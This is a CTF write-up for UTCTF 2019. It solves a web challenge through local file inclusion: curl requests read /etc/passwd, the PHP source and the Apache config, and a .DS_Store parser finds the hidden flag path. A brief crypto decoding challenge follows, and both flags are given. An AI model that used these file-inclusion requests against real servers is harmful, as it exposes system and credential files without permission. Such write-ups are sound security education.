CTF
Name : UTCTF 2019
Website : isss.io
Type : Online
Format : Jeopardy
CTF Time : link
650 - HabbyDabby's Secret Stash - Web
HabbyDabby's hidden some stuff away on his web server that he created and wrote from scratch on his Mac. See if you can find out what he's hidden and where he's hidden it!
http://a.goodsecurity.fail/
by copperstick6
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 <html > <head > <meta charset ="utf-8" > <meta http-equiv ="X-UA-Compatible" content ="IE=edge,chrome=1" > <title > Locked Away</title > <meta name ="description" content ="" > <meta name ="viewport" content ="width=device-width, initial-scale=1" > </head > <style > body { background-color :#62C2C5 ; } </style > <body > <h1 > Welcome to HabbyDabby's Secret Stash</h1 > <h2 > You'll never get our secrets!</h2 > <div style ="visibility: hidden; display:inline;" > <form method ="get" > <select name ="file" > <option value ="english.html" > English</option > <option value ="french.html" > French</option > </select > <input type ="submit" > </form > </div > </body > </html >
So there is an hidden form. We can call http://a.goodsecurity.fail/?file=english.html for example, telling us You'll never get our secrets! .
That sounds like an LFI (Local File Inclusion).
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $ curl http://a.goodsecurity.fail/?file=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/bin/false
Let's see the source code curl 'http://a.goodsecurity.fail/?file=index.php'
:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php if ( isset ( $_GET ['file' ] ) ) { $file = $_GET ['file' ]; if ( !file_exists ($file ) ) die ("File not found" ); if ($file === "english.html" || $file === "french.html" ){ echo file_get_contents ( $_GET ['file' ] ); } else { header ("Content-Disposition: attachment; filename=" . basename ($file )); header ("Content-Length: " . filesize ($file )); header ("Content-Type: application/octet-stream;" ); readfile ($file ); } } else { echo file_get_contents ("index.html" ); } ?>
At least there is nothing unusual, all seems to be default files for a Debian 9:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 curl 'http://a.goodsecurity.fail/?file=/etc/apache2/sites-enabled/000-default.conf' <VirtualHost *:80> ServerAdmin contact@isss.io ServerName localhost DocumentRoot /var/www/site <Directory /var/www/site/> Options Indexes FollowSymLinks MultiViews AllowOverride All Order deny,allow Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost>
The description is talking about MAC so I thought about __MACOSX
and .DS_Store
.
1 curl 'http://a.goodsecurity.fail/?file=.DS_Store' --output output
Let's try with the excellent tool: ds_store_exp , it parses .DS_Store
file and download files recursively:
1 2 3 4 5 6 7 8 $ python2 ds_store_exp/ds_store_exp.py 'http://a.goodsecurity.fail/.DS_Store' [+] http://a.goodsecurity.fail/.DS_Store [+] http://a.goodsecurity.fail/e/.DS_Store [+] http://a.goodsecurity.fail/index.html [+] http://a.goodsecurity.fail/a [+] http://a.goodsecurity.fail/e/d/.DS_Store [+] http://a.goodsecurity.fail/e/d/e/.DS_Store [+] http://a.goodsecurity.fail/e/d/e/flag.txt
1 2 $ curl http://a.goodsecurity.fail/e/d/e/flag.txt utflag{mac_os_hidden_files_are_stupid}
200 - [basics] crypto - Crypto
Can you make sense of this file?
by balex
TL;DR :
Binary to ascii
Base64 decode
Caesar cipher with a 10
shift
Alphabetical substitution
You can use https://cryptii.com/ or CLI.
utflag{3ncrypt10n_15_c00l}
The hardest part is to get the scoreboard alive to submit the flag.
Note: 0% real life but it is a starter challenge so I guess it is ok.